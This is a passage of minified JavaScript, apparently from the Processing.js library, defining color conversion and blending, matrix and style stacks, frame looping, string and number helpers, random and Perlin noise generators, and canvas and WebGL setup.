ed=cV.color.toRGB(ec,eb,d9);d7=ed[0];ea=ed[1];ee=ed[2]}else{d7=o.round(255*(ec/bG));ea=o.round(255*(eb/bF));ee=o.round(255*(d9/bD))}ef=o.round(255*(d8/bR));d7=d7<0?0:d7;ea=ea<0?0:ea;ee=ee<0?0:ee;ef=ef<0?0:ef;d7=d7>255?255:d7;ea=ea>255?255:ea;ee=ee>255?255:ee;ef=ef>255?255:ef;return ef<<24&4278190080|d7<<16&16711680|ea<<8&65280|ee&255}function dG(d7,d9){var d8;if(d7&4278190080){d8=o.round(255*(d9/bR));d8=d8>255?255:d8;d8=d8<0?0:d8;return d7-(d7&4278190080)+(d8<<24&4278190080)}if(cX===1){return dD(d7,d7,d7,d9)}if(cX===3){return dD(0,0,d7/bG*bD,d9)}}function dI(d7){if(d7<=bG&&d7>=0){if(cX===1){return dD(d7,d7,d7,bR)}if(cX===3){return dD(0,0,d7/bG*bD,bR)}}if(d7){if(d7>2147483647){d7-=4294967296}return d7}}cV.color=function(d7,ea,d9,d8){if(d7!==r&&ea!==r&&d9!==r&&d8!==r){return dD(d7,ea,d9,d8)}if(d7!==r&&ea!==r&&d9!==r){return dD(d7,ea,d9,bR)}if(d7!==r&&ea!==r){return dG(d7,ea)}if(typeof d7==="number"){return dI(d7)}return dD(bG,bF,bD,bR)};cV.color.toString=function(d7){return"rgba("+((d7>>16)&255)+","+((d7>>8)&255)+","+(d7&255)+","+((d7>>24)&255)/255+")"};cV.color.toInt=function(ea,d9,d7,d8){return d8<<24&4278190080|ea<<16&16711680|d9<<8&65280|d7&255};cV.color.toArray=function(d7){return[(d7>>16)&255,(d7>>8)&255,d7&255,(d7>>24)&255]};cV.color.toGLArray=function(d7){return[((d7>>16)&255)/255,((d7>>8)&255)/255,(d7&255)/255,((d7&4278190080)>>>24)/255]};cV.color.toRGB=function(d9,ef,ec){d9=d9>bG?bG:d9;ef=ef>bF?bF:ef;ec=ec>bD?bD:ec;d9=d9/bG*360;ef=ef/bF*100;ec=ec/bD*100;var ee=o.round(ec/100*255);if(ef===0){return[ee,ee,ee]}var ea=d9%360;var eb=ea%60;var d8=o.round(ec*(100-ef)/10000*255);var d7=o.round(ec*(6000-ef*eb)/600000*255);var ed=o.round(ec*(6000-ef*(60-eb))/600000*255);switch(o.floor(ea/60)){case 0:return[ee,ed,d8];case 1:return[d7,ee,d8];case 2:return[d8,ee,ed];case 3:return[d8,d7,ee];case 4:return[ed,d8,ee];case 5:return[ee,d8,d7]}};function aP(ee){var ed,ec,d8;ed=((ee>>16)&255)/255;ec=((ee>>8)&255)/255;d8=(ee&255)/255;var d7=cV.max(cV.max(ed,ec),d8),ea=cV.min(cV.min(ed,ec),d8),d9,eb;if(ea===d7){return[0,0,d7*bD]}eb=(d7-ea)/d7;if(ed===d7){d9=(ec-d8)/(d7-ea)}else{if(ec===d7){d9=2+(d8-ed)/(d7-ea)}else{d9=4+(ed-ec)/(d7-ea)}}d9/=6;if(d9<0){d9+=1}else{if(d9>1){d9-=1}}return[d9*bG,eb*bF,d7*bD]}cV.brightness=function(d7){return aP(d7)[2]};cV.saturation=function(d7){return aP(d7)[1]};cV.hue=function(d7){return aP(d7)[0]};cV.red=function(d7){return((d7>>16)&255)/255*bG};cV.green=function(d7){return((d7>>8)&255)/255*bF};cV.blue=function(d7){return(d7&255)/255*bD};cV.alpha=function(d7){return((d7>>24)&255)/255*bR};cV.lerpColor=function(ej,ei,ec){var eh,en,eo,ep,el,d7,ed,er,ek,es,eb,eq;var ef,ee,d8,em,eg;var ea=cV.color(ej);var d9=cV.color(ei);if(cX===3){ef=aP(ea);er=((ea>>24)&255)/bR;ee=aP(d9);eq=((d9>>24)&255)/bR;em=cV.lerp(ef[0],ee[0],ec);eg=cV.lerp(ef[1],ee[1],ec);eo=cV.lerp(ef[2],ee[2],ec);d8=cV.color.toRGB(em,eg,eo);ep=cV.lerp(er,eq,ec)*bR;return ep<<24&4278190080|(d8[0]&255)<<16|(d8[1]&255)<<8|d8[2]&255}el=(ea>>16)&255;d7=(ea>>8)&255;ed=ea&255;er=((ea>>24)&255)/bR;ek=(d9>>16)&255;es=(d9>>8)&255;eb=d9&255;eq=((d9&4278190080)>>>24)/bR;eh=cV.lerp(el,ek,ec)|0;en=cV.lerp(d7,es,ec)|0;eo=cV.lerp(ed,eb,ec)|0;ep=cV.lerp(er,eq,ec)*bR;return ep<<24&4278190080|eh<<16&16711680|en<<8&65280|eo&255};cV.colorMode=function(){cX=arguments[0];if(arguments.length>1){bG=arguments[1];bF=arguments[2]||arguments[1];bD=arguments[3]||arguments[1];bR=arguments[4]||arguments[1]}};cV.blendColor=function(d8,d7,d9){if(d9===0){return cV.modes.replace(d8,d7)}else{if(d9===1){return cV.modes.blend(d8,d7)}else{if(d9===2){return cV.modes.add(d8,d7)}else{if(d9===4){return cV.modes.subtract(d8,d7)}else{if(d9===8){return cV.modes.lightest(d8,d7)}else{if(d9===16){return cV.modes.darkest(d8,d7)}else{if(d9===32){return cV.modes.difference(d8,d7)}else{if(d9===64){return cV.modes.exclusion(d8,d7)}else{if(d9===128){return cV.modes.multiply(d8,d7)}else{if(d9===256){return cV.modes.screen(d8,d7)}else{if(d9===1024){return cV.modes.hard_light(d8,d7)}else{if(d9===2048){return cV.modes.soft_light(d8,d7)}else{if(d9===512){return cV.modes.overlay(d8,d7)}else{if(d9===4096){return cV.modes.dodge(d8,d7)}else{if(d9===8192){return cV.modes.burn(d8,d7)}}}}}}}}}}}}}}}};function aC(){d4.save()}function cO(){d4.restore();b2=true;ap=true}cV.printMatrix=function(){dF.print()};bO.prototype.translate=function(d7,d8){dF.translate(d7,d8);aQ.invTranslate(d7,d8);d4.translate(d7,d8)};by.prototype.translate=function(d7,d9,d8){dF.translate(d7,d9,d8);aQ.invTranslate(d7,d9,d8)};bO.prototype.scale=function(d7,d8){dF.scale(d7,d8);aQ.invScale(d7,d8);d4.scale(d7,d8||d7)};by.prototype.scale=function(d7,d9,d8){dF.scale(d7,d9,d8);aQ.invScale(d7,d9,d8)};bO.prototype.pushMatrix=function(){al.load(dF);c9.load(aQ);aC()};by.prototype.pushMatrix=function(){al.load(dF);c9.load(aQ)};bO.prototype.popMatrix=function(){dF.set(al.pop());aQ.set(c9.pop());cO()};by.prototype.popMatrix=function(){dF.set(al.pop());aQ.set(c9.pop())};bO.prototype.resetMatrix=function(){dF.reset();aQ.reset();d4.setTransform(1,0,0,1,0,0)};by.prototype.resetMatrix=function(){dF.reset();aQ.reset()};dp.prototype.applyMatrix=function(){var d7=arguments;dF.apply(d7[0],d7[1],d7[2],d7[3],d7[4],d7[5],d7[6],d7[7],d7[8],d7[9],d7[10],d7[11],d7[12],d7[13],d7[14],d7[15]);aQ.invApply(d7[0],d7[1],d7[2],d7[3],d7[4],d7[5],d7[6],d7[7],d7[8],d7[9],d7[10],d7[11],d7[12],d7[13],d7[14],d7[15])};bO.prototype.applyMatrix=function(){var d7=arguments;for(var d8=d7.length;d8<16;d8++){d7[d8]=0}d7[10]=d7[15]=1;dp.prototype.applyMatrix.apply(this,d7)};cV.rotateX=function(d7){dF.rotateX(d7);aQ.invRotateX(d7)};bO.prototype.rotateZ=function(){throw"rotateZ() is not supported in 2D mode. Use rotate(float) instead."};by.prototype.rotateZ=function(d7){dF.rotateZ(d7);aQ.invRotateZ(d7)};cV.rotateY=function(d7){dF.rotateY(d7);aQ.invRotateY(d7)};bO.prototype.rotate=function(d7){dF.rotateZ(d7);aQ.invRotateZ(d7);d4.rotate(d7)};by.prototype.rotate=function(d7){cV.rotateZ(d7)};cV.pushStyle=function(){aC();cV.pushMatrix();var d7={doFill:aF,currentFillColor:aX,doStroke:cd,currentStrokeColor:cu,curTint:bb,curRectMode:bI,curColorMode:cX,colorModeX:bG,colorModeZ:bD,colorModeY:bF,colorModeA:bR,curTextFont:U,horizontalTextAlignment:L,verticalTextAlignment:c0,textMode:cH,curFontName:W,curTextSize:dW,curTextAscent:aZ,curTextDescent:dx,curTextLeading:d3};bj.push(d7)};cV.popStyle=function(){var d7=bj.pop();if(d7){cO();cV.popMatrix();aF=d7.doFill;aX=d7.currentFillColor;cd=d7.doStroke;cu=d7.currentStrokeColor;bb=d7.curTint;bI=d7.curRectmode;cX=d7.curColorMode;bG=d7.colorModeX;bD=d7.colorModeZ;bF=d7.colorModeY;bR=d7.colorModeA;U=d7.curTextFont;W=d7.curFontName;dW=d7.curTextSize;L=d7.horizontalTextAlignment;c0=d7.verticalTextAlignment;cH=d7.textMode;aZ=d7.curTextAscent;dx=d7.curTextDescent;d3=d7.curTextLeading}else{throw"Too many popStyle() without enough pushStyle()"}};cV.year=function(){return(new Date).getFullYear()};cV.month=function(){return(new Date).getMonth()+1};cV.day=function(){return(new Date).getDate()};cV.hour=function(){return(new Date).getHours()};cV.minute=function(){return(new Date).getMinutes()};cV.second=function(){return(new Date).getSeconds()};cV.millis=function(){return Date.now()-dm};function cs(){var d7=(Date.now()-dq)/1000;N++;var d8=N/d7;if(d7>0.5){dq=Date.now();N=0;cV.__frameRate=d8}cV.frameCount++}bO.prototype.redraw=function(){cs();d4.lineWidth=dS;var d7=cV.pmouseX,d8=cV.pmouseY;cV.pmouseX=dJ;cV.pmouseY=d1;aC();cV.draw();cO();dJ=cV.mouseX;d1=cV.mouseY;cV.pmouseX=d7;cV.pmouseY=d8};by.prototype.redraw=function(){cs();var d7=cV.pmouseX,d8=cV.pmouseY;cV.pmouseX=dJ;cV.pmouseY=d1;d4.clear(d4.DEPTH_BUFFER_BIT);dz={attributes:{},locations:{}};cV.noLights();cV.lightFalloff(1,0,0);cV.shininess(1);cV.ambient(255,255,255);cV.specular(0,0,0);cV.emissive(0,0,0);cV.camera();cV.draw();dJ=cV.mouseX;d1=cV.mouseY;cV.pmouseX=d7;cV.pmouseY=d8};cV.noLoop=function(){aB=false;aw=false;clearInterval(b3);cP.onPause()};cV.loop=function(){if(aw){return}dq=Date.now();N=0;b3=B.setInterval(function(){try{cP.onFrameStart();cV.redraw();cP.onFrameEnd()}catch(d7){B.clearInterval(b3);throw d7}},ay);aB=true;aw=true;cP.onLoop()};cV.frameRate=function(d7){dQ=d7;ay=1000/dQ;if(aB){cV.noLoop();cV.loop()}};var at=[];function bM(d9,d8,d7){if(d9.addEventListener){d9.addEventListener(d8,d7,false)}else{d9.attachEvent("on"+d8,d7)}at.push({elem:d9,type:d8,fn:d7})}function dd(d7){var ea=d7.elem,d9=d7.type,d8=d7.fn;if(ea.removeEventListener){ea.removeEventListener(d9,d8,false)}else{if(ea.detachEvent){ea.detachEvent("on"+d9,d8)}}}cV.exit=function(){B.clearInterval(b3);J(cV.externals.canvas.id);for(var d8 in D.lib){if(D.lib.hasOwnProperty(d8)){if(D.lib[d8].hasOwnProperty("detach")){D.lib[d8].detach(cV)}}}var d7=at.length;while(d7--){dd(at[d7])}cP.onExit()};cV.cursor=function(){if(arguments.length>1||arguments.length===1&&arguments[0] instanceof cV.PImage){var ea=arguments[0],d7,ec;if(arguments.length>=3){d7=arguments[1];ec=arguments[2];if(d7<0||ec<0||ec>=ea.height||d7>=ea.width){throw"x and y must be non-negative and less than the dimensions of the image"}}else{d7=ea.width>>>1;ec=ea.height>>>1}var d8=ea.toDataURL();var d9='url("'+d8+'") '+d7+" "+ec+", default";X=ac.style.cursor=d9}else{if(arguments.length===1){var eb=arguments[0];X=ac.style.cursor=eb}else{X=ac.style.cursor=cj}}};cV.noCursor=function(){X=ac.style.cursor=z.NOCURSOR};cV.link=function(d7,d8){if(d8!==r){B.open(d7,d8)}else{B.location=d7}};cV.beginDraw=E;cV.endDraw=E;bO.prototype.toImageData=function(d7,ea,d8,d9){d7=d7!==r?d7:0;ea=ea!==r?ea:0;d8=d8!==r?d8:cV.width;d9=d9!==r?d9:cV.height;return d4.getImageData(d7,ea,d8,d9)};by.prototype.toImageData=function(ef,ee,eg,eb){ef=ef!==r?ef:0;ee=ee!==r?ee:0;eg=eg!==r?eg:cV.width;eb=eb!==r?eb:cV.height;var ed=d.createElement("canvas"),eh=ed.getContext("2d"),ea=eh.createImageData(eg,eb),d8=new b(eg*eb*4);d4.readPixels(ef,ee,eg,eb,d4.RGBA,d4.UNSIGNED_BYTE,d8);for(var d9=0,ec=d8.length,d7=ea.data;d9<ec;d9++){d7[d9]=d8[(eb-1-o.floor(d9/4/eg))*eg*4+d9%(eg*4)]}return ea};cV.status=function(d7){B.status=d7};cV.binary=function(d8,d9){var ea;if(d9>0){ea=d9}else{if(d8 instanceof bN){ea=16;d8|=0}else{ea=32;while(ea>1&&!(d8>>>ea-1&1)){ea--}}}var d7="";while(ea>0){d7+=d8>>>--ea&1?"1":"0"}return d7};cV.unbinary=function(d8){var ea=d8.length-1,d9=1,d7=0;while(ea>=0){var eb=d8[ea--];if(eb!=="0"&&eb!=="1"){throw"the value passed into unbinary was not an 8 bit binary number"}if(eb==="1"){d7+=d9}d9<<=1}return d7};function cW(ej,eh,eb,em,ed,ek){var d9=ej<0?eb:eh;var d8=ed===0;var ei=ed===r||ed<0?0:ed;var eg=o.abs(ej);if(d8){ei=1;eg*=10;while(o.abs(o.round(eg)-eg)>0.000001&&ei<7){++ei;eg*=10}}else{if(ei!==0){eg*=o.pow(10,ei)}}var ea,ef=eg*2;if(o.floor(eg)===eg){ea=eg}else{if(o.floor(ef)===ef){var d7=o.floor(eg);ea=d7+d7%2}else{ea=o.round(eg)}}var ec="";var el=em+ei;while(el>0||ea>0){el--;ec=""+ea%10+ec;ea=o.floor(ea/10)}if(ek!==r){var ee=ec.length-3-ei;while(ee>0){ec=ec.substring(0,ee)+ek+ec.substring(ee);ee-=3}}if(ei>0){return d9+ec.substring(0,ec.length-ei)+"."+ec.substring(ec.length-ei,ec.length)}return d9+ec}function an(ed,ec,d7,ef,d8,ee){if(ed instanceof Array){var ea=[];for(var d9=0,eb=ed.length;d9<eb;d9++){ea.push(cW(ed[d9],ec,d7,ef,d8,ee))}return ea}return cW(ed,ec,d7,ef,d8,ee)}cV.nf=function(d9,d7,d8){return an(d9,"","-",d7,d8)};cV.nfs=function(d9,d7,d8){return an(d9," ","-",d7,d8)};cV.nfp=function(d9,d7,d8){return an(d9,"+","-",d7,d8)};cV.nfc=function(d9,d7,d8){return an(d9,"","-",d7,d8,",")};var aK=function(d9,d8){d8=d8===r||d8===null?d8=8:d8;if(d9<0){d9=4294967295+d9+1}var d7=Number(d9).toString(16).toUpperCase();while(d7.length<d8){d7="0"+d7}if(d7.length>=d8){d7=d7.substring(d7.length-d8,d7.length)}return d7};cV.hex=function(d8,d7){if(arguments.length===1){if(d8 instanceof bN){d7=4}else{d7=8}}return aK(d8,d7)};function dB(d7){var d8=parseInt("0x"+d7,16);if(d8>2147483647){d8-=4294967296}return d8}cV.unhex=function(d9){if(d9 instanceof Array){var d7=[];for(var d8=0;d8<d9.length;d8++){d7.push(dB(d9[d8]))}return d7}return dB(d9)};cV.loadStrings=function(d8){if(localStorage[d8]){return localStorage[d8].split("\n")}var d7=u(d8);if(typeof d7!=="string"||d7===""){return[]}d7=d7.replace(/(\r\n?)/g,"\n").replace(/\n$/,"");return d7.split("\n")};cV.saveStrings=function(d8,d7){localStorage[d8]=d7.join("\n")};cV.loadBytes=function(d9){var d8=u(d9);var d7=[];for(var ea=0;ea<d8.length;ea++){d7.push(d8.charCodeAt(ea))}return d7};function a8(d7){return Array.prototype.slice.call(d7,1)}cV.matchAll=function(d8,d7){var ea=[],d9;var eb=new RegExp(d7,"g");while((d9=eb.exec(d8))!==null){ea.push(d9);if(d9[0].length===0){++eb.lastIndex}}return ea.length>0?ea:null};cV.__contains=function(d8,d7){if(typeof d8!=="string"){return d8.contains.apply(d8,a8(arguments))}return d8!==null&&d7!==null&&typeof d7==="string"&&d8.indexOf(d7)>-1};cV.__replaceAll=function(d7,d9,d8){if(typeof d7!=="string"){return d7.replaceAll.apply(d7,a8(arguments))}return d7.replace(new RegExp(d9,"g"),d8)};cV.__replaceFirst=function(d7,d9,d8){if(typeof d7!=="string"){return d7.replaceFirst.apply(d7,a8(arguments))}return d7.replace(new RegExp(d9,""),d8)};cV.__replace=function(ea,ec,eb){if(typeof ea!=="string"){return ea.replace.apply(ea,a8(arguments))}if(ec instanceof RegExp){return ea.replace(ec,eb)}if(typeof ec!=="string"){ec=ec.toString()}if(ec===""){return ea}var d9=ea.indexOf(ec);if(d9<0){return ea}var d8=0,d7="";do{d7+=ea.substring(d8,d9)+eb;d8=d9+ec.length}while((d9=ea.indexOf(ec,d8))>=0);return d7+ea.substring(d8)};cV.__equals=function(d8,d7){if(d8.equals instanceof Function){return d8.equals.apply(d8,a8(arguments))}return d8.valueOf()===d7.valueOf()};cV.__equalsIgnoreCase=function(d8,d7){if(typeof d8!=="string"){return d8.equalsIgnoreCase.apply(d8,a8(arguments))}return d8.toLowerCase()===d7.toLowerCase()};cV.__toCharArray=function(d9){if(typeof d9!=="string"){return d9.toCharArray.apply(d9,a8(arguments))}var ea=[];for(var d8=0,d7=d9.length;d8<d7;++d8){ea[d8]=new bN(d9.charAt(d8))}return ea};cV.__split=function(ea,eb,d8){if(typeof ea!=="string"){return ea.split.apply(ea,a8(arguments))}var ed=new RegExp(eb);if(d8===r||d8<1){return ea.split(ed)}var d7=[],ec=ea,ee;while((ee=ec.search(ed))!==-1&&d7.length<d8-1){var d9=ed.exec(ec).toString();d7.push(ec.substring(0,ee));ec=ec.substring(ee+d9.length)}if(ee!==-1||ec!==""){d7.push(ec)}return d7};cV.__codePointAt=function(ea,d8){var eb=ea.charCodeAt(d8),d9,d7;if(55296<=eb&&eb<=56319){d9=eb;d7=ea.charCodeAt(d8+1);return(d9-55296)*1024+(d7-56320)+65536}return eb};cV.match=function(d8,d7){return d8.match(d7)};cV.__startsWith=function(d7,d9,d8){if(typeof d7!=="string"){return d7.startsWith.apply(d7,a8(arguments))}d8=d8||0;if(d8<0||d8>d7.length){return false}return d9===""||d9===d7?true:d7.indexOf(d9)===d8};cV.__endsWith=function(d8,d9){if(typeof d8!=="string"){return d8.endsWith.apply(d8,a8(arguments))}var d7=d9?d9.length:0;return d9===""||d9===d8?true:d8.indexOf(d9)===d8.length-d7};cV.__hashCode=function(d7){if(d7.hashCode instanceof Function){return d7.hashCode.apply(d7,a8(arguments))}return h(d7)};cV.__printStackTrace=function(d7){cV.println("Exception: "+d7.toString())};var d6=[];cV.println=function(d7){var d8=d6.length;if(d8){D.logger.log(d6.join(""));d6.length=0}if(arguments.length===0&&d8===0){D.logger.log("")}else{if(arguments.length!==0){D.logger.log(d7)}}};cV.print=function(d7){d6.push(d7)};cV.str=function(d9){if(d9 instanceof Array){var d7=[];for(var d8=0;d8<d9.length;d8++){d7.push(d9[d8].toString()+"")}return d7}return d9.toString()+""};cV.trim=function(d9){if(d9 instanceof Array){var d7=[];for(var d8=0;d8<d9.length;d8++){d7.push(d9[d8].replace(/^\s*/,"").replace(/\s*$/,"").replace(/\r*$/,""))}return d7}return d9.replace(/^\s*/,"").replace(/\s*$/,"").replace(/\r*$/,"")};function aO(d7){if(typeof d7==="number"){return d7!==0}if(typeof d7==="boolean"){return d7}if(typeof d7==="string"){return d7.toLowerCase()==="true"}if(d7 instanceof bN){return d7.code===49||d7.code===84||d7.code===116}}cV.parseBoolean=function(d9){if(d9 instanceof Array){var d7=[];for(var d8=0;d8<d9.length;d8++){d7.push(aO(d9[d8]))}return d7}return aO(d9)};cV.parseByte=function(d9){if(d9 instanceof Array){var d7=[];for(var d8=0;d8<d9.length;d8++){d7.push(0-(d9[d8]&128)|d9[d8]&127)}return d7}return 0-(d9&128)|d9&127};cV.parseChar=function(d9){if(typeof d9==="number"){return new bN(String.fromCharCode(d9&65535))}if(d9 instanceof Array){var d7=[];for(var d8=0;d8<d9.length;d8++){d7.push(new bN(String.fromCharCode(d9[d8]&65535)))}return d7}throw"char() may receive only one argument of type int, byte, int[], or byte[]."};function cN(d7){if(typeof d7==="number"){return d7}if(typeof d7==="boolean"){return d7?1:0}if(typeof d7==="string"){return parseFloat(d7)}if(d7 instanceof bN){return d7.code}}cV.parseFloat=function(d9){if(d9 instanceof Array){var d7=[];for(var d8=0;d8<d9.length;d8++){d7.push(cN(d9[d8]))}return d7}return cN(d9)};function ak(d9,d7){if(typeof d9==="number"){return d9&4294967295}if(typeof d9==="boolean"){return d9?1:0}if(typeof d9==="string"){var d8=parseInt(d9,d7||10);return d8&4294967295}if(d9 instanceof bN){return d9.code}}cV.parseInt=function(ea,d9){if(ea instanceof Array){var d7=[];for(var d8=0;d8<ea.length;d8++){if(typeof ea[d8]==="string"&&!/^\s*[+\-]?\d+\s*$/.test(ea[d8])){d7.push(0)}else{d7.push(ak(ea[d8],d9))}}return d7}return ak(ea,d9)};cV.__int_cast=function(d7){return 0|d7};cV.__instanceof=function(d9,d8){if(typeof d8!=="function"){throw"Function is expected as type argument for instanceof operator"}if(typeof d9==="string"){return d8===Object||d8===String}if(d9 instanceof d8){return true}if(typeof d9!=="object"||d9===null){return false}var eb=d9.constructor;if(d8.$isInterface){var ea=[];while(eb){if(eb.$interfaces){ea=ea.concat(eb.$interfaces)}eb=eb.$base}while(ea.length>0){var d7=ea.shift();if(d7===d8){return true}if(d7.$interfaces){ea=ea.concat(d7.$interfaces)}}return false}while(eb.hasOwnProperty("$base")){eb=eb.$base;if(eb===d8){return true}}return false};cV.abs=o.abs;cV.ceil=o.ceil;cV.constrain=function(d8,d9,d7){return d8>d7?d7:d8<d9?d9:d8};cV.dist=function(){var d9,d8,d7;if(arguments.length===4){d9=arguments[0]-arguments[2];d8=arguments[1]-arguments[3];return o.sqrt(d9*d9+d8*d8)}if(arguments.length===6){d9=arguments[0]-arguments[3];d8=arguments[1]-arguments[4];d7=arguments[2]-arguments[5];return o.sqrt(d9*d9+d8*d8+d7*d7)}};cV.exp=o.exp;cV.floor=o.floor;cV.lerp=function(d8,d7,d9){return(d7-d8)*d9+d8};cV.log=o.log;cV.mag=function(d8,d7,d9){if(d9){return o.sqrt(d8*d8+d7*d7+d9*d9)}return o.sqrt(d8*d8+d7*d7)};cV.map=function(ea,d8,d9,d7,eb){return d7+(eb-d7)*((ea-d8)/(d9-d8))};cV.max=function(){if(arguments.length===2){return arguments[0]<arguments[1]?arguments[1]:arguments[0]}var d8=arguments.length===1?arguments[0]:arguments;if(!("length" in d8&&d8.length>0)){throw"Non-empty array is expected"}var d7=d8[0],ea=d8.length;for(var d9=1;d9<ea;++d9){if(d7<d8[d9]){d7=d8[d9]}}return d7};cV.min=function(){if(arguments.length===2){return arguments[0]<arguments[1]?arguments[0]:arguments[1]}var d7=arguments.length===1?arguments[0]:arguments;if(!("length" in d7&&d7.length>0)){throw"Non-empty array is expected"}var d9=d7[0],ea=d7.length;for(var d8=1;d8<ea;++d8){if(d9>d7[d8]){d9=d7[d8]}}return d9};cV.norm=function(d8,d7,d9){return(d8-d7)/(d9-d7)};cV.pow=o.pow;cV.round=o.round;cV.sq=function(d7){return d7*d7};cV.sqrt=o.sqrt;cV.acos=o.acos;cV.asin=o.asin;cV.atan=o.atan;cV.atan2=o.atan2;cV.cos=o.cos;cV.degrees=function(d7){return d7*180/o.PI};cV.radians=function(d7){return d7/180*o.PI};cV.sin=o.sin;cV.tan=o.tan;var bW=o.random;cV.random=function(){if(arguments.length===0){return bW()}if(arguments.length===1){return bW()*arguments[0]}var d8=arguments[0],d7=arguments[1];return bW()*(d7-d8)+d8};function cn(d9,d8){var eb=d9||362436069,d7=d8||521288629;var ea=function(){eb=36969*(eb&65535)+(eb>>>16)&4294967295;d7=18000*(d7&65535)+(d7>>>16)&4294967295;return((eb&65535)<<16|d7&65535)&4294967295};this.nextDouble=function(){var ec=ea()/4294967296;return ec<0?1+ec:ec};this.nextInt=ea}cn.createRandomized=function(){var d7=new Date;return new cn(d7/60000&4294967295,d7&4294967295)};cV.randomSeed=function(d7){bW=(new cn(d7)).nextDouble};cV.Random=function(d7){var ea=false,d8,d9;this.nextGaussian=function(){if(ea){ea=false;return d8}var ee,ec,eb;do{ee=2*d9()-1;ec=2*d9()-1;eb=ee*ee+ec*ec}while(eb>=1||eb===0);var ed=o.sqrt(-2*o.log(eb)/eb);d8=ec*ed;ea=true;return ee*ed};d9=d7===r?o.random:(new cn(d7)).nextDouble};function dw(ee){var d8=ee!==r?new cn(ee):cn.createRandomized();var ed,eb;var ea=new b(512);for(ed=0;ed<256;++ed){ea[ed]=ed}for(ed=0;ed<256;++ed){var eg=ea[eb=d8.nextInt()&255];ea[eb]=ea[ed];ea[ed]=eg}for(ed=0;ed<256;++ed){ea[ed+256]=ea[ed]}function d7(ek,eh,en,em){var el=ek&15;var ej=el<8?eh:en,ei=el<4?en:el===12||el===14?eh:em;return((el&1)===0?ej:-ej)+((el&2)===0?ei:-ei)}function ec(ej,eh,ek){var ei=(ej&1)===0?eh:ek;return(ej&2)===0?-ei:ei}function ef(ei,eh){return(ei&1)===0?-eh:eh}function d9(ej,ei,eh){return ei+ej*(eh-ei)}this.noise3d=function(et,es,er){var ek=o.floor(et)&255,ei=o.floor(es)&255,eh=o.floor(er)&255;et-=o.floor(et);es-=o.floor(es);er-=o.floor(er);var eo=(3-2*et)*et*et,en=(3-2*es)*es*es,em=(3-2*er)*er*er;var ev=ea[ek]+ei,eq=ea[ev]+eh,ep=ea[ev+1]+eh,eu=ea[ek+1]+ei,el=ea[eu]+eh,ej=ea[eu+1]+eh;return d9(em,d9(en,d9(eo,d7(ea[eq],et,es,er),d7(ea[el],et-1,es,er)),d9(eo,d7(ea[ep],et,es-1,er),d7(ea[ej],et-1,es-1,er))),d9(en,d9(eo,d7(ea[eq+1],et,es,er-1),d7(ea[el+1],et-1,es,er-1)),d9(eo,d7(ea[ep+1],et,es-1,er-1),d7(ea[ej+1],et-1,es-1,er-1))))};this.noise2d=function(eh,eo){var en=o.floor(eh)&255,el=o.floor(eo)&255;eh-=o.floor(eh);eo-=o.floor(eo);var ej=(3-2*eh)*eh*eh,ei=(3-2*eo)*eo*eo;var em=ea[en]+el,ek=ea[en+1]+el;return d9(ei,d9(ej,ec(ea[em],eh,eo),ec(ea[ek],eh-1,eo)),d9(ej,ec(ea[em+1],eh,eo-1),ec(ea[ek+1],eh-1,eo-1)))};this.noise1d=function(eh){var ej=o.floor(eh)&255;eh-=o.floor(eh);var ei=(3-2*eh)*eh*eh;return d9(ei,ef(ea[ej],eh),ef(ea[ej+1],eh-1))}}var bU={generator:r,octaves:4,fallout:0.5,seed:r};cV.noise=function(d7,ee,ed){if(bU.generator===r){bU.generator=new dw(bU.seed)}var ec=bU.generator;var eb=1,d8=1,ea=0;for(var d9=0;d9<bU.octaves;++d9){eb*=bU.fallout;switch(arguments.length){case 1:ea+=eb*(1+ec.noise1d(d8*d7))/2;break;case 2:ea+=eb*(1+ec.noise2d(d8*d7,d8*ee))/2;break;case 3:ea+=eb*(1+ec.noise3d(d8*d7,d8*ee,d8*ed))/2;break}d8*=2}return ea};cV.noiseDetail=function(d8,d7){bU.octaves=d8;if(d7!==r){bU.fallout=d7}};cV.noiseSeed=function(d7){bU.seed=d7;bU.generator=r};dp.prototype.size=function(d8,eb,ea){if(cd){cV.stroke(0)}if(aF){cV.fill(255)}var d9={fillStyle:d4.fillStyle,strokeStyle:d4.strokeStyle,lineCap:d4.lineCap,lineJoin:d4.lineJoin};if(ac.style.length>0){ac.style.removeProperty("width");ac.style.removeProperty("height")}ac.width=cV.width=d8||100;ac.height=cV.height=eb||100;for(var ec in d9){if(d9.hasOwnProperty(ec)){d4[ec]=d9[ec]}}cV.textFont(U);cV.background();bY=o.max(1000,d8*eb*0.05);cV.externals.context=d4;for(var d7=0;d7<720;d7++){ag[d7]=cV.sin(d7*(o.PI/180)*0.5);bi[d7]=cV.cos(d7*(o.PI/180)*0.5)}};bO.prototype.size=function(d7,d9,d8){if(d4===r){d4=ac.getContext("2d");al=new T;c9=new T;dF=new aT;aQ=new aT}dp.prototype.size.apply(this,arguments)};by.prototype.size=function(){var d8=false;return function d7(ea,ec,eb){if(d8){throw"Multiple calls to size() for 3D renders are not allowed."}d8=true;function ed(ef){var ei=["experimental-webgl","webgl","webkit-3d"],eh;for(var eg=0,ee=ei.length;eg<ee;eg++){eh=ef.getContext(ei[eg],{antialias:false});if(eh){break}}return eh}try{ac.width=cV.width=ea||100;ac.height=cV.height=ec||100;d4=ed(ac);c6=d4.createTexture();bP=d4.createTexture()}catch(d9){D.debug(d9)}if(!d4){throw"WebGL context is not supported on this browser."}d4.viewport(0,0,ac.width,ac.height);d4.enable(d4.DEPTH_TEST);d4.enable(d4.BLEND);d4.blendFunc(d4.SRC_ALPHA,d4.ONE_MINUS_SRC_ALPHA);dM=bC(d4,ad,bX);bQ=bC(d4,bS,bf);cV.strokeWeight(1);du=bC(d4,d5,bH);d4.useProgram(du);dV("usingTexture3d",du,"usingTexture",dP);cV.lightFalloff(1,0,0);cV.shininess(1);cV.ambient(255,255,255);cV.specular(0,0,0);cV.emissive(0,0,0);bd=d4.createBuffer();d4.bindBuffer(d4.ARRAY_BUFFER,bd);d4.bufferData(d4.ARRAY_BUFFER,df,d4.STATIC_DRAW);cI=d4.createBuffer();d4.bindBuffer(d4.ARRAY_BUFFER,cI);d4.bufferData(d4.ARRAY_BUFFER,de,d4.STATIC_DRAW);di=d4.createBuffer();d4.bindBuffer(d4.ARRAY_BUFFER,di);d4.bufferData(d4.ARRAY_BUFFER,bE,d4.STATIC_DRAW);aA=d4.createBuffer();d4.bindBuffer(d4.ARRAY_BUFFER,aA);d4.bufferData(d4.ARRAY_BUFFER,aj,d4.STATIC_DRAW);b1=d4.createBuffer();d4.bindBuffer(d4.ARRAY_BUFFER,b1);d4.bufferData(d4.ARRAY_BUFFER,ah,d4.STATIC_